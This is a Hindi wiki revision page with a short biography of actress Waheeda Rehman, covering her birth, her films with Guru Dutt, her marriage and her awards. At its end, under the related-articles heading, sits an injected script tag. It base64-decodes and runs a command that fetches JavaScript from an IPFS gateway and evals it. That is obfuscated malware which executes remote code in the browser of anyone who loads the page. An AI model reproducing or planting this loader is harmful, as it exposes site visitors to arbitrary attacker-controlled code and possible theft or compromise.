वहीदा रहमान: Difference between revisions
[unchecked revision] | [unchecked revision] |
व्यवस्थापन (talk | contribs) m (Text replace - "काग़ज " to "काग़ज़ ") |
गोविन्द राम (talk | contribs) No edit summary |
||
Line 30: | Line 30: | ||
|अन्य जानकारी= | |अन्य जानकारी= | ||
|बाहरी कड़ियाँ= | |बाहरी कड़ियाँ= | ||
|अद्यतन= | |अद्यतन={{अद्यतन|15:34, 16 दिसम्बर 2011 (IST)}} | ||
}} | }} | ||
वहीदा रहमान ([[अंग्रेज़ी भाषा|अंग्रेज़ी]]: ''Waheeda Rehman'') (जन्म- [[14 मई]], 1936) एक प्रसिद्ध भारतीय फ़िल्म अभिनेत्री हैं। वहीदा रहमान भारतीय फ़िल्म इतिहास की सर्वश्रेष्ठ अभिनेत्रियों में से एक हैं। गाइड, प्यासा, चौदहवीं का चाँद, काग़ज़ के फूल, साहिब बीबी और ग़ुलाम, तीसरी कसम आदि वहीदा रहमान की उल्लेखनीय फ़िल्में हैं। | वहीदा रहमान ([[अंग्रेज़ी भाषा|अंग्रेज़ी]]: ''Waheeda Rehman'') (जन्म- [[14 मई]], 1936) एक प्रसिद्ध भारतीय फ़िल्म अभिनेत्री हैं। वहीदा रहमान भारतीय फ़िल्म इतिहास की सर्वश्रेष्ठ अभिनेत्रियों में से एक हैं। गाइड, प्यासा, चौदहवीं का चाँद, काग़ज़ के फूल, साहिब बीबी और ग़ुलाम, तीसरी कसम आदि वहीदा रहमान की उल्लेखनीय फ़िल्में हैं। |
Revision as of 10:04, 16 December 2011
वहीदा रहमान
| |
पूरा नाम | वहीदा रहमान |
जन्म | 14 मई, 1936 |
जन्म भूमि | हैदराबाद |
पति/पत्नी | स्व. गुरु दत्त, कमलजीत सिंह |
कर्म भूमि | मुंबई |
कर्म-क्षेत्र | अभिनेत्री |
मुख्य फ़िल्में | गाइड, प्यासा, चौदहवीं का चाँद, काग़ज़ के फूल, साहिब बीबी और ग़ुलाम, तीसरी कसम |
पुरस्कार-उपाधि | पद्मश्री, पद्म भूषण, चार बार सर्वश्रेष्ठ अभिनेत्री, फ़िल्म फ़ेयर लाइफ़टाइम एचीवमेंट अवॉर्ड, एनटीआर राष्ट्रीय पुरस्कार |
नागरिकता | भारतीय |
अद्यतन | 15:34, 16 दिसम्बर 2011 (IST)
|
वहीदा रहमान (अंग्रेज़ी: Waheeda Rehman) (जन्म- 14 मई, 1936) एक प्रसिद्ध भारतीय फ़िल्म अभिनेत्री हैं। वहीदा रहमान भारतीय फ़िल्म इतिहास की सर्वश्रेष्ठ अभिनेत्रियों में से एक हैं। गाइड, प्यासा, चौदहवीं का चाँद, काग़ज़ के फूल, साहिब बीबी और ग़ुलाम, तीसरी कसम आदि वहीदा रहमान की उल्लेखनीय फ़िल्में हैं।
जन्म
वहीदा रहमान का जन्म 14 मई 1936 में हैदराबाद के एक परंपरागत मुस्लिम परिवार में हुआ था।
अभिनय की प्रेरणा
डाक्टर बनने का सपना संजो रखा था वहीदा रहमान ने पर किस्मत को ये मंजूर न था, फेफड़ों में इंफेक्शन की वजह से वह यथोचित शिक्षा प्राप्त नहीं कर सकी। भरतनाट्यम में प्रवीन वहीदा रहमान को अपने अभिभावकों से अभिनय की प्रेरणा मिली। सन 1955 में उन्हें एक के बाद एक करके दो तेलुगू फ़िल्मों में काम करने अवसर मिल गया।
सफलता
फ़िल्म सी.आई.डी. (1956) में खलनायिका का रोल दे कर गुरु दत्त वहीदा को बंबई (वर्तमान मुंबई) ले आये। सी.आई.डी. की सफलता के बाद फ़िल्म प्यासा (1957) में वहीदा रहमान को हीरोइन का रोल मिला। फ़िल्म प्यासा से ही गुरु दत्त और वहीदा रहमान का विफल प्रेम प्रसंग का आरंभ हुआ। गुरु दत्त एवं वहीदा रहमान अभिनीत फ़िल्म काग़ज़ के फूल (1959) की असफल प्रेम कथा उन दोनों की स्वयं के जीवन पर आधारित थी। दोनों ही कलाकारों ने फ़िल्म चौदहवीं का चाँद (1960) और साहिब बीबी और ग़ुलाम (1962) में साथ-साथ काम किया।[1]
thumb|left|250px|वहीदा रहमान
Waheeda Rehman
विवाह
सन 1963 में गुरु दत्त और वहीदा रहमान के बीच अनबन हो गयी और उनके बीच दूरी बढ़ गई। सन् 1964 में गुरु दत्त ने आत्महत्या कर ली। वहीदा रहमान ने 27 अप्रैल 1974 को कमलजीत सिंह, जो कि फ़िल्म शगुन (1964) में उनके साथ हीरो थे, से विवाह कर लिया।
पुरस्कार
- नागरिक सम्मान
भारत के तीसरे सबसे प्रतिष्ठित नागरिक सम्मान पद्म भूषण के लिए नामित किए जाने पर बॉलीवुड की सदाबहार अभिनेत्री वहीदा रहमान ने सिनेमा उद्योग में और काम करने की उम्मीद ज़ाहिर की है।
वर्ष | फ़िल्म का नाम |
---|
- सर्वश्रेष्ठ अभिनेत्री
- 1966 - फ़िल्मफ़ेयर पुरस्कार - गाइड
- 1967 - बंगाल फ़िल्मी पत्रकार संघ पुरस्कार - तीसरी कसम
- 1968 - फ़िल्मफ़ेयर पुरस्कार - नीलकमल
- 1971 - राष्ट्रीय फ़िल्म पुरस्कार - रेशमा और शेरा
- अन्य
- 1994 - फ़िल्म फ़ेयर लाइफ़टाइम एचीवमेंट अवॉर्ड
- 2006 - एनटीआर राष्ट्रीय पुरस्कार
|
|
|
|
|
टीका टिप्पणी और संदर्भ
- ↑ वहीदा रहमान – एक परिपक्व अभिनेत्री (हिन्दी) (पी.एच.पी) हिन्दी वेबसाइट। अभिगमन तिथि: 3 मई, 2011।
- ↑ वहीदा रहमान – एक परिपक्व अभिनेत्री (हिन्दी) (पी.एच.पी) हिन्दी वेबसाइट। अभिगमन तिथि: 3 मई, 2011।
संबंधित लेख
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>